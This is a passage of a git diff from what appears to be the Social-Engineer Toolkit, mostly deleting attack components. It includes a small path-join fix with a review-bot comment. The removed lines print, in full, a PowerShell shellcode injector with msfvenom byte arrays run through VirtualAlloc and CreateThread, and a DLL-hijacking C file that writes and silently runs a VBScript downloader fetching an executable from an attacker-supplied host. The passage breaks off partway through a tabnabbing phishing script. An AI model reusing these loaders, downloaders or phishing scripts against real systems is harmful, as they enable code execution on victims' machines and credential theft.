0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# 64-bit payload -# msfvenom windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc64 = 
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# Determine if Powershell is running as 32 or 64 bit -[Byte[]]$sc = $sc32 -if ([IntPtr]::Size -eq 8) {$sc = $sc64} - -# Calculate correct size param for VirtualAlloc -$size = 0x1000 -if ($sc.Length -gt 0x1000) {$size = $sc.Length} - -# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000. -# Allocate RWX memory block -$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) - -# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. 
I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
-for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
-
-# Execute you payload
-$winFunc::CreateThread(0,0,$x,0,0,0)
diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py
index 692654783..e31c1d8f5 100644
--- a/src/teensy/teensy.py
+++ b/src/teensy/teensy.py
@@ -129,7 +129,7 @@ if choice == "13":
 # save our stuff here
 print(core.bcolors.BLUE + "\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.userconfigpath,
- "reports" +
+ "reports",
 "teensy_{0}.ino".format(now))) + core.bcolors.ENDC)
 print(core.bcolors.GREEN +
diff --git a/src/webattack/dll_hijacking/hijacking.c.wscript b/src/webattack/dll_hijacking/hijacking.c.wscript
deleted file mode 100644
index 6adc7f3f1..000000000
--- a/src/webattack/dll_hijacking/hijacking.c.wscript
+++ /dev/null
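Review bot: The path in the "INO file created" message is presumably also built where the file is actually written, just above this hunk, and building it twice is what let the old `"reports" +` slip through: the old line printed `<userconfigpath>/reportsteensy_<ts>.ino` while the write (if it uses its own join) pointed somewhere else, so the user was told a location that did not exist. Compute it once into a local, e.g. `ino_path = os.path.join(core.userconfigpath, "reports", "teensy_{0}.ino".format(now))`, and use that same name for both the write and the message so the two cannot drift again. The `if choice == "13":` block this line belongs to starts and ends outside the hunk, so the write site itself is not visible here.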
@@ -1,89 +0,0 @@
-/*
-
-DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the
-Social-Engineer Toolkit (SET) spear-phishing attack vector.
-
-This is an ugly cscript downloader, it works on all platforms but
-will rewrite in C later instead of cscript.
-
-strFileURL = "http://IPADDRHERE/x"
-strHDLocation = "C:\x.exe"
-Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
-objXMLHTTP.open "GET", strFileURL, false
-objXMLHTTP.send()
-If objXMLHTTP.Status = 200 Then
-Set objADOStream = CreateObject("ADODB.Stream")
-objADOStream.Open
-objADOStream.Type = 1
-objADOStream.Write
-objXMLHTTP.ResponseBody
-objADOStream.Position = 0
-Set objFSO = Createobject("Scripting.FileSystemObject")
-If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
-Set objFSO = Nothing
-objADOStream.SaveToFile strHDLocation
-objADOStream.Close
-Set objADOStream = Nothing
-End if
-Set objXMLHTTP = Nothing
-Set WshShell = WScript.CreateObject("WScript.Shell")
-WshShell.Run "c:\x.exe"
-
-*/
-
-#include
-#include
-#include
-
-
-
-int run()
-{
-
- FILE *file;
- char* command = "cmd /c cscript c:\\x.vbs"; // execute the vbs script after fopen write
- char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // in SET does a replace of the length of IP address then terminates with a null byte to remove the rest of the X's
- file = fopen("C:\\x.vbs", "w"); // write file x.vbs
- fprintf(file,"strFileURL = \"http://%s/x\"\nstrHDLocation = \"C:\\x.exe\"\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.open \"GET\", strFileURL, false\nobjXMLHTTP.send()\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject(\"ADODB.Stream\")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject(\"Scripting.FileSystemObject\")\nIf objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile strHDLocation\nobjADOStream.Close\nSet objADOStream
= Nothing\nEnd if\nSet objXMLHTTP = Nothing\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nWshShell.Run \"c:\\x.exe\"", host); // write the downloader file, this will grab an executable
- fclose(file); // close the file
-
- STARTUPINFO si;
- PROCESS_INFORMATION pi;
-
- ZeroMemory( &si, sizeof(si) );
- si.cb = sizeof(si);
- ZeroMemory( &pi, sizeof(pi) );
- si.dwFlags = STARTF_USESHOWWINDOW;
- si.wShowWindow = SW_HIDE; // hide the window
-
- // Start the child process.
- if( !CreateProcess( NULL, // No module name (use command line)
- command, // Command line
- NULL, // Process handle not inheritable
- NULL, // Thread handle not inheritable
- FALSE, // Set handle inheritance to FALSE
- 0, // No creation flags
- NULL, // Use parent's environment block
- NULL, // Use parent's starting directory
- &si, // Pointer to STARTUPINFO structure
- &pi ) // Pointer to PROCESS_INFORMATION structure
- )
-
- // Wait until child process exits.
- WaitForSingleObject( pi.hProcess, INFINITE );
-
- // Close process and thread handles.
- CloseHandle( pi.hProcess );
- CloseHandle( pi.hThread );
- sleep(5);
-
-exit(0);
-return 0;
-}
-
-BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
-{
- run();
- return 0;
-}
-
diff --git a/src/webattack/dll_hijacking/hijacking.dll b/src/webattack/dll_hijacking/hijacking.dll
deleted file mode 100755
index 7d4f27cd7..000000000
Binary files a/src/webattack/dll_hijacking/hijacking.dll and /dev/null differ
diff --git a/src/webattack/dll_hijacking/hijacking.dll.wscript b/src/webattack/dll_hijacking/hijacking.dll.wscript
deleted file mode 100755
index 0b7daec12..000000000
Binary files a/src/webattack/dll_hijacking/hijacking.dll.wscript and /dev/null differ
diff --git a/src/webattack/tabnabbing/source.js b/src/webattack/tabnabbing/source.js
deleted file mode 100644
index 5007794b3..000000000
--- a/src/webattack/tabnabbing/source.js
+++ /dev/null
@@ -1,65 +0,0 @@
-(function(){
-
-var TIMER = null;
-var HAS_SWITCHED = false;
-
-window.onblur = function(){
- TIMER = setTimeout(changeItUp, 1000);
-}
-
-window.onfocus = function(){
- if(TIMER) clearTimeout(TIMER);
-}
-
-favicon = {
- docHead: document.getElementsByTagName("head")[0],
- set: function(url){
- this.addLink(url);
- },
-
- addLink: function(iconURL) {
- var link = document.createElement("link");
- link.type = "image/x-icon";
- link.rel = "shortcut icon";
- link.href = iconURL;
- this.removeLinkIfExists();
- this.docHead.appendChild(link);
- },
-
- removeLinkIfExists: function() {
- var links = this.docHead.getElementsByTagName("link");
- for (var i=0; i